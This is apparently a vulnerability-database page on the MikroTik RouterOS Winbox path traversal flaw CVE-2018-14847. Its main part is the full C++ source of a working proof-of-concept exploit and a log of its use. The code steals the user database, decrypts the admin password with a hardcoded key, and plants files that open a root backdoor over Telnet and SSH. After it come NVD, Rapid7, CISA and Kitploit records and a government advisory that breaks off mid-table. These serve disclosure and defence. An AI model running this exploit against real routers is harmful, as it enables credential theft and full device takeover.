https://github.com/tenable/routeros/tree/master/poc/bytheway\n \nThe exploit leverages the path traversal vulnerability CVE-2018-14847 to extract the admin password and create an \"option\" package to enable the developer backdoor. Post exploitation the attacker can connect to Telnet or SSH using the root user \"devel\" with the admin's password.\n \nMikrotik patched CVE-2018-14847 back in April. However, until this PoC was written, I don't believe its been publicly disclosed that the attack can be levegered to write files. You can find Mikrotik's advisory here:\n \nhttps://blog.mikrotik.com/security/winbox-vulnerability.html\n \nNote that, while this exploit is written for Winbox, it could be ported to HTTP as long as you had prior knowledge of the admin credentials.\n \n# Usage Example\n \n[email\u00a0protected]:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251\nTrying 192.168.1.251...\nConnected to 192.168.1.251.\nEscape character is '^]'.\nPassword: \nLogin failed, incorrect username or password\n \nConnection closed by foreign host.\n[email\u00a0protected]:~/mikrotik/poc/bytheway/build$ ./btw -i 192.168.1.251\n \n \u2554\u2557 \u252c \u252c \u250c\u252c\u2510\u252c \u252c\u250c\u2500\u2510 \u2566 \u2566\u250c\u2500\u2510\u252c \u252c\n \u2560\u2569\u2557\u2514\u252c\u2518 \u2502 \u251c\u2500\u2524\u251c\u2524 \u2551\u2551\u2551\u251c\u2500\u2524\u2514\u252c\u2518\n \u255a\u2550\u255d \u2534 \u2534 \u2534 \u2534\u2514\u2500\u2518 \u255a\u2569\u255d\u2534 \u2534 \u2534 \n \n[+] Extracting passwords from 192.168.1.251:8291\n[+] Searching for administrator credentials \n[+] Using credentials - admin:lol\n[+] Creating /pckg/option on 192.168.1.251:8291\n[+] Creating /flash/nova/etc/devel-login on 192.168.1.251:8291\n[+] There's a light on\n[email\u00a0protected]:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251\nTrying 192.168.1.251...\nConnected to 192.168.1.251.\nEscape character is '^]'.\nPassword: \n \n \nBusyBox v1.00 (2017.03.02-08:29+0000) Built-in shell (ash)\nEnter 'help' for a list of built-in commands.\n \n# uname -a\nLinux MikroTik 3.3.5 #1 Thu Mar 2 08:16:25 UTC 2017 mips unknown\n# cat /rw/logs/VERSION\nv6.38.4 Mar/08/2017 09:26:17\n# Connection closed by foreign host.\n*/\n#include <sstream>\n#include <cstdlib>\n#include <iostream>\n#include <boost/cstdint.hpp>\n#include <boost/program_options.hpp>\n \n#include \"winbox_session.hpp\"\n#include \"winbox_message.hpp\"\n#include \"md5.hpp\"\n \nnamespace\n{\n const char s_version[] = \"By the Way 1.0.0\";\n \n /*!\n * Parses the command line arguments. The program will always use two\n * parameters (ip and winbox port) but the port will default to 8291 if\n * not present on the CLI\n *\n * \\param[in] p_arg_count the number of arguments on the command line\n * \\param[in] p_arg_array the arguments passed on the command line\n * \\param[in,out] p_ip the ip address to connect to\n * \\param[in,out] p_winbox_port the winbox port to connect to\n * \\return true if we have valid ip and ports. false otherwise.\n */\n bool parseCommandLine(int p_arg_count, const char* p_arg_array[],\n std::string& p_ip, std::string& p_winbox_port)\n {\n boost::program_options::options_description description(\"options\");\n description.add_options()\n (\"help,h\", \"A list of command line options\")\n (\"version,v\", \"Display version information\")\n (\"winbox-port,w\", boost::program_options::value<std::string>()->default_value(\"8291\"), \"The winbox port\")\n (\"ip,i\", boost::program_options::value<std::string>(), \"The ip to connect to\");\n \n boost::program_options::variables_map argv_map;\n try\n {\n boost::program_options::store(\n boost::program_options::parse_command_line(\n p_arg_count, p_arg_array, description), argv_map);\n }\n catch (const std::exception& e)\n {\n std::cerr << e.what() << \"\\n\" << std::endl;\n std::cerr << description << std::endl;\n return false;\n }\n \n boost::program_options::notify(argv_map);\n if (argv_map.empty() || argv_map.count(\"help\"))\n {\n std::cerr << description << std::endl;\n return false;\n }\n \n if (argv_map.count(\"version\"))\n {\n std::cerr << \"Version: \" << ::s_version << std::endl;\n return false;\n }\n \n if (argv_map.count(\"ip\") && argv_map.count(\"winbox-port\"))\n {\n p_ip.assign(argv_map[\"ip\"].as<std::string>());\n p_winbox_port.assign(argv_map[\"winbox-port\"].as<std::string>());\n return true;\n }\n else\n {\n std::cerr << description << std::endl;\n }\n \n return false;\n }\n \n /*!\n * This function uses the file disclosure vulnerability, CVE-2018-14847, to\n * download the user database from /flash/rw/store/user.dat\n *\n * \\param[in] p_ip the address of the router to connect to\n * \\param[in] p_winbox_port the winbox port to connect to\n * \\return a string containing the user.dat data or an empty string on error\n */\n std::string getPasswords(const std::string& p_ip, const std::string& p_winbox_port)\n {\n std::cout << \"[+] Extracting passwords from \" << p_ip << \":\" << p_winbox_port << std::endl;\n Winbox_Session winboxSession(p_ip, p_winbox_port);\n if (!winboxSession.connect())\n {\n std::cerr << \"[!] Failed to connect to the remote host\" << std::endl;\n return std::string();\n }\n \n WinboxMessage msg;\n msg.set_to(2, 2);\n msg.set_command(7);\n msg.set_request_id(1);\n msg.set_reply_expected(true);\n msg.add_string(1, \"//./.././.././../flash/rw/store/user.dat\");\n winboxSession.send(msg);\n \n msg.reset();\n if (!winboxSession.receive(msg))\n {\n std::cerr << \"[!] Error receiving an open file response.\" << std::endl;\n return std::string();\n }\n \n boost::uint32_t sessionID = msg.get_session_id();\n boost::uint16_t file_size = msg.get_u32(2);\n if (file_size == 0)\n {\n std::cerr << \"[!] File size is 0\" << std::endl;\n return std::string();\n }\n \n msg.reset();\n msg.set_to(2, 2);\n msg.set_command(4);\n msg.set_request_id(2);\n msg.set_reply_expected(true);\n msg.set_session_id(sessionID);\n msg.add_u32(2, file_size);\n winboxSession.send(msg);\n \n msg.reset();\n if (!winboxSession.receive(msg))\n {\n std::cerr << \"[!] Error receiving a file content response.\" << std::endl;\n return std::string();\n }\n \n return msg.get_raw(0x03);\n }\n \n /*!\n * Looks through the user.dat file for an enabled administrative account that\n * we can use. Once a useful account is found the password is decrypted.\n *\n * \\param[in] p_user_dat the user.dat file data\n * \\param[in,out] p_username stores the found admin username\n * \\param[in,out] p_password stores the found admin password\n * \\return true on success and false otherwrise\n */\n bool get_password(const std::string p_user_dat, std::string& p_username, std::string& p_password)\n {\n std::cout << \"[+] Searching for administrator credentials \" << std::endl;\n \n // the dat file is a series of nv::messages preceded by a two byte length\n std::string dat(p_user_dat);\n while (dat.size() > 4)\n {\n boost::uint16_t length = *reinterpret_cast<const boost::uint16_t*>(&dat[0]);\n if (dat[2] != 'M' || dat[3] != '2')\n {\n // this is mild insanity but the .dat file messages don't line\n // up properly if a new user is added or whatever.\n dat.erase(0, 1);\n continue;\n }\n dat.erase(0, 4);\n length -= 4;\n \n if (length > dat.size())\n {\n return false;\n }\n \n std::string entry(dat.data(), length);\n dat.erase(0, length);\n \n WinboxMessage msg;\n msg.parse_binary(entry);\n \n // we need an active admin account\n // 0x2 has three groups: 1 (read), 2 (write), 3 (full)\n if (msg.get_u32(2) == 3 && msg.get_boolean(0xfe000a) == false)\n {\n p_username.assign(msg.get_string(1));\n \n std::string encrypted_pass(msg.get_string(0x11));\n if (!encrypted_pass.empty() && msg.get_u32(0x1f) != 0)\n {\n std::string hash_this(p_username);\n hash_this.append(\"283i4jfkai3389\");\n \n MD5 md5;\n md5.update(hash_this.c_str(), hash_this.size());\n md5.finalize();\n std::string md5_hash(md5.getDigest());\n \n for (std::size_t i = 0; i < encrypted_pass.size(); i++)\n {\n boost::uint8_t decrypted = encrypted_pass[i] ^ md5_hash[i % md5_hash.size()];\n if (decrypted == 0)\n {\n // a null terminator! We did it.\n return true;\n }\n p_password.push_back(decrypted);\n }\n p_password.clear();\n }\n }\n }\n return false;\n }\n}\n \n/*!\n * This function creates the file /pckg/option on the target. This will enable\n * the developer login on Telnet and SSH. Oddly, you'll first need to log in\n * to Telnet for SSH to work, but I digress...\n *\n * \\param[in] p_ip the ip address of the router\n * \\param[in] p_port the port of the jsproxy we'll connect to\n * \\param[in] p_username the username we'll authenticate with\n * \\param[in] p_password the password we'll authenticate with\n * \\return true if we successfully created the file.\n */\nbool create_file(const std::string& p_ip, const std::string& p_port,\n const std::string& p_username, const std::string& p_password)\n{\n Winbox_Session mproxy_session(p_ip, p_port);\n if (!mproxy_session.connect())\n {\n std::cerr << \"[-] Failed to connect to the remote host\" << std::endl;\n return false;\n }\n \n boost::uint32_t p_session_id = 0;\n if (!mproxy_session.login(p_username, p_password, p_session_id))\n {\n std::cerr << \"[-] Login failed.\" << std::endl;\n return false;\n }\n \n std::cout << \"[+] Creating /pckg/option on \" << p_ip << \":\" << p_port << std::endl;\n \n WinboxMessage msg;\n msg.set_to(2, 2);\n msg.set_command(1);\n msg.set_request_id(1);\n msg.set_reply_expected(true);\n msg.set_session_id(p_session_id);\n msg.add_string(1, \"//./.././.././../pckg/option\");\n mproxy_session.send(msg);\n \n msg.reset();\n mproxy_session.receive(msg);\n if (msg.has_error())\n {\n std::cout << \"[-] \" << msg.get_error_string() << std::endl;\n return false;\n }\n \n std::cout << \"[+] Creating /flash/nova/etc/devel-login on \" << p_ip << \":\" << p_port << std::endl;\n msg.reset();\n msg.set_to(2, 2);\n msg.set_command(1);\n msg.set_request_id(2);\n msg.set_reply_expected(true);\n msg.set_session_id(p_session_id);\n msg.add_string(1, \"//./.././.././../flash/nova/etc/devel-login\");\n mproxy_session.send(msg);\n \n msg.reset();\n mproxy_session.receive(msg);\n if (msg.has_error())\n {\n std::cout << \"[-] \" << msg.get_error_string() << std::endl;\n return false;\n }\n \n return true;\n}\n \nint main(int p_argc, const char** p_argv)\n{\n std::string ip;\n std::string winbox_port;\n if (!parseCommandLine(p_argc, p_argv, ip, winbox_port))\n {\n return EXIT_FAILURE;\n }\n \n std::cout << std::endl;\n std::cout << \" \u2554\u2557 \u252c \u252c \u250c\u252c\u2510\u252c \u252c\u250c\u2500\u2510 \u2566 \u2566\u250c\u2500\u2510\u252c \u252c\" << std::endl;\n std::cout << \" \u2560\u2569\u2557\u2514\u252c\u2518 \u2502 \u251c\u2500\u2524\u251c\u2524 \u2551\u2551\u2551\u251c\u2500\u2524\u2514\u252c\u2518\" << std::endl;\n std::cout << \" \u255a\u2550\u255d \u2534 \u2534 \u2534 \u2534\u2514\u2500\u2518 \u255a\u2569\u255d\u2534 \u2534 \u2534 \" << std::endl;\n std::cout << std::endl;\n \n // step one - do the file disclosure\n std::string user_dat(getPasswords(ip, winbox_port));\n if (user_dat.empty())\n {\n return EXIT_FAILURE;\n }\n \n // step two - parse the password\n std::string admin_username;\n std::string admin_password;\n if (!get_password(user_dat, admin_username, admin_password))\n {\n std::cout << \"[-] Failed to find admin creds. Trying default.\" << std::endl;\n admin_username.assign(\"admin\");\n admin_password.assign(\"\");\n }\n \n std::cout << \"[+] Using credentials - \" << admin_username << \":\" << admin_password << std::endl;\n \n // step three - create the file\n if (!create_file(ip, winbox_port, admin_username, admin_password))\n {\n return EXIT_FAILURE;\n }\n \n std::cout << \"[+] There's a light on\" << std::endl;\n return EXIT_SUCCESS;\n}\n", "sourceHref": "https://0day.today/exploit/31296", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "cve": [{"lastseen": "2023-06-23T14:27:52", "description": "MikroTik RouterOS through 6.42 allows unauthenticated remote attackers to read arbitrary files and remote authenticated attackers to write arbitrary files due to a directory traversal vulnerability in the WinBox interface.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2018-08-02T07:29:00", "type": "cve", "title": "CVE-2018-14847", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2019-03-07T14:12:00", "cpe": ["cpe:/o:mikrotik:routeros:6.42"], "id": "CVE-2018-14847", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-14847", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:o:mikrotik:routeros:6.42:*:*:*:*:*:*:*"]}], "rapid7blog": [{"lastseen": "2020-11-06T20:46:05", "description": "## Insert 'What Year Is It' meme\n\n\n\n[h00die](<https://github.com/h00die>) contributed the [Mikrotik unauthenticated directory traversal file read](<https://github.com/rapid7/metasploit-framework/pull/14280>) auxiliary gather module, largely a port of the PoC by [Ali Mosajjal](<https://github.com/mosajjal>). The vulnerability [CVE-2018-14847](<https://attackerkb.com/topics/oOoUGd0y46/cve-2018-14847?referrer=blog>) allows any file from the router to be read through the Winbox server in RouterOS due to a lack of validation and trust in the Winbox client. The `auxiliary/gather/mikrotik_winbox_fileread` module exploits this vulnerability by communicating with the Winbox server on port 8291 and requests the system user database file. One would hope all vulnerable MikroTik\u2019s have been patched by now, but if you happen to discover a vulnerable instance it's time to dump the credentials! Vulnerable versions of MikroTik RouterOS are:\n\n * (bugfix) 6.30.1-6.40.7\n * (current) 6.29-6.42\n * (RC) 6.29rc1-6.43rc3\n\n## WordPress plugin giveth\n\nSecurity researcher [mslavco](<https://twitter.com/mslavco/>) discovered an unauthenticated, time-based blind SQL injection in the Loginizer WordPress plugin\u2019s `log` parameter. [h00die](<https://github.com/h00die>) contributed the [WordPress Loginizer log SQLi Scanner](<https://github.com/rapid7/metasploit-framework/pull/14319>) auxiliary scanner module that exploits the vulnerability ([CVE-2020-27615](<https://attackerkb.com/topics/9fQo2hkkZm/cve-2020-27615?referrer=blog>) to extract user credentials and then store them in the database. Loginizer versions 1.6.3 and earlier are vulnerable to the `auxiliary/scanner/http/wp_loginizer_log_sqli` module, and it is important to note that successful exploitation requires WordPress 5.4 (or newer) or 5.5 (or newer).\n\n## New modules (2)\n\n * [Mikrotik Winbox Arbitrary File Read](<https://github.com/rapid7/metasploit-framework/pull/14280>) by h00die and mosajjal, which exploits [CVE-2018-14847](<https://attackerkb.com/topics/oOoUGd0y46/cve-2018-14847?referrer=blog>)\n * [WordPress Loginizer log SQLi Scanner](<https://github.com/rapid7/metasploit-framework/pull/14319>) by h00die, mslavco, and red0xff, which exploits [CVE-2020-27615](<https://attackerkb.com/topics/9fQo2hkkZm/cve-2020-27615?referrer=blog>)\n\n## Enhancements and features\n\n * PR [#14252](<https://github.com/rapid7/metasploit-framework/pull/14252>) by [h00die](<https://github.com/h00die>) updates the Avira password gather to store captured credentials in the database and adds support for exporting `Raw-MD5u` hashes, which are used by Avira to store passwords.\n * PR [#14270](<https://github.com/rapid7/metasploit-framework/pull/14270>) by [Jeffrey Martin](<https://github.com/jmartin-r7>) adds guards to notify users of incorrect or missing encoders while allowing the encoding process to continue.\n * PR [#14282](<https://github.com/rapid7/metasploit-framework/pull/14282>) by [h00die](<https://github.com/h00die>) enhanced the Metasploit loader to provide more accurate error messages when an external module fails to load.\n * PR [#14297](<https://github.com/rapid7/metasploit-framework/pull/14297>) by [Steve Passino](<https://github.com/spassino>) updated `auxiliary/scanner/http/zabbix_login` to support Zabbix version 3.x, 4.x, and 5.x up to the latest 5.2 LTS release.\n\n## Bugs fixed\n\n * PR [#14222](<https://github.com/rapid7/metasploit-framework/pull/14222>) by [JRodriguez556](<https://github.com/JRodriguez556>) replace calls to the depreciated `URI.encode` function with calls to `Rex::Text.uri_encode` in `exploits/multi/http/php_fpm_rce`.\n * PR [#14323](<https://github.com/rapid7/metasploit-framework/pull/14323>) by [Spencer McIntyre](<https://github.com/zeroSteiner>) fixes an issue in `auxiliary/gather/enum_dns` that only affects zone transfer enumeration (AXFR) by using the nameservers specified in the datastore `NS` option.\n * PR [#14326](<https://github.com/rapid7/metasploit-framework/pull/14326>) by [Christopher Granleese](<https://github.com/cgranleese-r7>) fixes an issue in `store_loot` in which certain data types were not properly stored and resulted in a subsequent stack trace.\n * PR [#14350](<https://github.com/rapid7/metasploit-framework/pull/14350>) by [Mat\u00fa\u0161 Bursa](<https://github.com/matusso>) added the missing `nasm` dependency to ensure that `tools/exploit/nasm_shell.rb` works as expected when running inside of Docker.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.14...6.0.15](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-10-29T13%3A21%3A34%2B00%3A00..2020-11-05T10%3A12%3A21-06%3A00%22>)\n * [Full diff 6.0.14...6.0.15](<https://github.com/rapid7/metasploit-framework/compare/6.0.14...6.0.15>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2020-11-06T19:55:51", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-14847", "CVE-2020-27615"], "modified": "2020-11-06T19:55:51", "id": "RAPID7BLOG:B6B5A95341EBF4792BAD1B887E8F35DC", "href": "https://blog.rapid7.com/2020/11/06/metasploit-wrap-up-86/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2022-01-26T11:34:49", "description": "CISA has added five new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\nCVE Number | **CVE Title** | Remediation Due Date \n---|---|--- \n[CVE-2020-11261](<https://nvd.nist.gov/vuln/detail/CVE-2020-11261>) | Qualcomm Multiple Chipsets Improper Input Validation Vulnerability | 06/01/2022 \n[CVE-2018-14847](<https://nvd.nist.gov/vuln/detail/CVE-2018-14847>) | MikroTik Router OS Directory Traversal Vulnerability | 06/01/2022 \n[CVE-2021-37415](<https://nvd.nist.gov/vuln/detail/CVE-2021-37415>) | Zoho ManageEngine ServiceDesk Authentication Bypass Vulnerability | 12/15/2021 \n[CVE-2021-40438](<https://nvd.nist.gov/vuln/detail/CVE-2021-40438>) | Apache HTTP Server-Side Request Forgery (SSRF) | 12/15/2021 \n[CVE-2021-44077](<https://nvd.nist.gov/vuln/detail/CVE-2021-44077>) | Zoho ManageEngine ServiceDesk Plus Remote Code Execution | 12/15/2021 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>). \n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/12/01/cisa-adds-five-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-01T00:00:00", "type": "cisa", "title": "CISA Adds Five Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847", "CVE-2020-11261", "CVE-2021-37415", "CVE-2021-40438", "CVE-2021-44077"], "modified": "2022-01-25T00:00:00", "id": "CISA:72D01121CAFBC56638BC974ABA539CF8", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/12/01/cisa-adds-five-known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2023-07-04T12:36:55", "description": "[](<https://2.bp.blogspot.com/-WrSl3k8acz8/XKK-mOdvWPI/AAAAAAAAOaA/AhYa9ilCzBkxcfAhNbVH3l5YsgRSvL6tgCLcBGAs/s1600/Darksplitz.png>)\n\n \nThis tools is continued from Nefix, DirsPy and Xmasspy project. \n \n**Installation** \nWill work fine in the [debian](<https://www.kitploit.com/search/label/Debian> \"debian\" ) shade operating system, like Backbox, Ubuntu or Kali linux. \n\n\n 1. `$ git clone https://github.com/koboi137/darksplitz`\n 2. `$ cd darksplitz/`\n 3. `$ sudo ./install.sh`\n \n**Features** \n\n\n * Extract [mikrotik](<https://www.kitploit.com/search/label/MikroTik> \"mikrotik\" ) credential (user.dat)\n * Password generator\n * Reverse IP lookup\n * Mac address sniffer\n * Online md5 cracker\n * Mac address lookup\n * Collecting url from web.archive.org\n * Web [backdoor](<https://www.kitploit.com/search/label/Backdoor> \"backdoor\" ) (Dark Shell)\n * Winbox exploit (CVE-2018-14847)\n * ChimeyRed exploit for mipsbe (Mikrotik)\n * Exploit web application\n * Mass apple dos (CVE-2018-4407)\n * Libssh exploit (CVE-2018-10933)\n * Discovering Mikrotik device\n * Directory scanner\n * Subdomain scanner\n * Mac address scanner\n * Mac address pinger\n * Vhost [scanner](<https://www.kitploit.com/search/label/Scanner> \"scanner\" ) (bypass cloudflare)\n * Mass [bruteforce](<https://www.kitploit.com/search/label/Bruteforce> \"bruteforce\" ) (wordpress)\n * Interactive msfrpc client\n \n**Exploit web application** \n\n\n * plUpload file upload\n * jQuery file upload (CVE-2018-9206)\n * Laravel (.env)\n * sftp-config.json (misc)\n * Wordpress register (enable)\n * elfinder file upload\n * Drupal 7 exploit (CVE-2018-7600)\n * Drupal 8 exploit (CVE-2018-7600)\n * com_fabrik exploit (joomla)\n * gravityform plugin file upload (wordpress)\n * geoplace3 plugin file upload (wordpress)\n * peugeot-music plugin file upload (wordpress)\n \n**Notes** \nThis tool will work fine under root, because scapy module and other need root user to access more features. But you can run as user too in some features. ;) \n \n \n\n\n**[Download Darksplitz](<https://github.com/koboi137/darksplitz> \"Download Darksplitz\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-04T21:12:00", "type": "kitploit", "title": "Darksplitz - Exploit Framework", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10933", "CVE-2018-14847", "CVE-2018-4407", "CVE-2018-7600", "CVE-2018-9206"], "modified": "2019-04-04T21:12:09", "id": "KITPLOIT:5494076556436489947", "href": "http://www.kitploit.com/2019/04/darksplitz-exploit-framework.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ics": [{"lastseen": "2023-09-23T06:41:43", "description": "### Summary\n\nBest Practices \n\u2022 Apply patches as soon as possible \n\u2022 Disable unnecessary ports and protocols \n\u2022 Replace end-of-life infrastructure \n\u2022 Implement a centralized patch management system\n\nThis joint Cybersecurity Advisory describes the ways in which People\u2019s Republic of China (PRC) state-sponsored cyber actors continue to exploit publicly known vulnerabilities in order to establish a broad network of compromised infrastructure. These actors use the network to exploit a wide variety of targets worldwide, including public and private sector organizations. The advisory details the targeting and compromise of major telecommunications companies and network service providers and the top vulnerabilities\u2014primarily Common Vulnerabilities and Exposures (CVEs)\u2014associated with network devices routinely exploited by the cyber actors since 2020.\n\nThis joint Cybersecurity Advisory was coauthored by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI). It builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal, and territorial (SLTT) government; critical infrastructure (CI), including the Defense Industrial Base (DIB); and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).\n\nEntities can mitigate the vulnerabilities listed in this advisory by applying the available patches to their systems, replacing end-of-life infrastructure, and implementing a centralized patch management program.\n\nNSA, CISA, and the FBI urge U.S. and allied governments, CI, and private industry organizations to apply the recommendations listed in the Mitigations section and Appendix A: Vulnerabilities to increase their defensive posture and reduce the risk of PRC state-sponsored malicious cyber actors affecting their critical networks.\n\nFor more information on PRC state-sponsored malicious cyber activity, see CISA\u2019s [China Cyber Threat Overview and Advisories](<https://www.cisa.gov/uscert/china>) webpage.\n\n[Click here](<https://media.defense.gov/2022/Jun/07/2003013376/-1/-1/0/CSA_PRC_SPONSORED_CYBER_ACTORS_EXPLOIT_NETWORK_PROVIDERS_DEVICES_TLPWHITE.PDF>) for PDF.\n\n### Common vulnerabilities exploited by People\u2019s Republic of China state-sponsored cyber actors\n\nPRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. Network devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as additional access points to route command and control (C2) traffic and act as midpoints to conduct network intrusions on other entities. Over the last few years, a series of high-severity vulnerabilities for network devices provided cyber actors with the ability to regularly exploit and gain access to vulnerable infrastructure devices. In addition, these devices are often overlooked by cyber defenders, who struggle to maintain and keep pace with routine software patching of Internet-facing services and endpoint devices.\n\nSince 2020, PRC state-sponsored cyber actors have conducted widespread campaigns to rapidly exploit publicly identified security vulnerabilities, also known as common vulnerabilities and exposures (CVEs). This technique has allowed the actors to gain access into victim accounts using publicly available exploit code against virtual private network (VPN) services [[T1133](<https://attack.mitre.org/techniques/T1133/>)] or public facing applications [[T1190](<https://attack.mitre.org/techniques/T1190/>)]\u2014without using their own distinctive or identifying malware\u2014so long as the actors acted before victim organizations updated their systems. \n\nPRC state-sponsored cyber actors typically conduct their intrusions by accessing compromised servers called hop points from numerous China-based Internet Protocol (IP) addresses resolving to different Chinese Internet service providers (ISPs). The cyber actors typically obtain the use of servers by leasing remote access directly or indirectly from hosting providers. They use these servers to register and access operational email accounts, host C2 domains, and interact with victim networks. Cyber actors use these hop points as an obfuscation technique when interacting with victim networks.\n\nThese cyber actors are also consistently evolving and adapting tactics to bypass defenses. NSA, CISA, and the FBI have observed state-sponsored cyber actors monitoring network defenders\u2019 accounts and actions, and then modifying their ongoing campaign as needed to remain undetected. Cyber actors have modified their infrastructure and toolsets immediately following the release of information related to their ongoing campaigns. PRC state-sponsored cyber actors often mix their customized toolset with publicly available tools, especially by leveraging tools that are native to the network environment, to obscure their activity by blending into the noise or normal activity of a network.\n\nNSA, CISA, and the FBI consider the common vulnerabilities and exposures (CVEs) listed in Table 1 to be the network device CVEs most frequently exploited by PRC state-sponsored cyber actors since 2020.\n\n_**Table 1: Top network device CVEs exploited by PRC state-sponsored cyber actors**_\n\nVendor CVE Vulnerability Type \n--- \nCisco | CVE-2018-0171 | Remote Code Execution \nCVE-2019-15271 | RCE \nCVE-2019-1652 | RCE \nCitrix | CVE-2019-19781 | RCE \nDrayTek | CVE-2020-8515 | RCE \nD-Link | CVE-2019-16920 | RCE \nFortinet | CVE-2018-13382 | Authentication Bypass \nMikroTik | 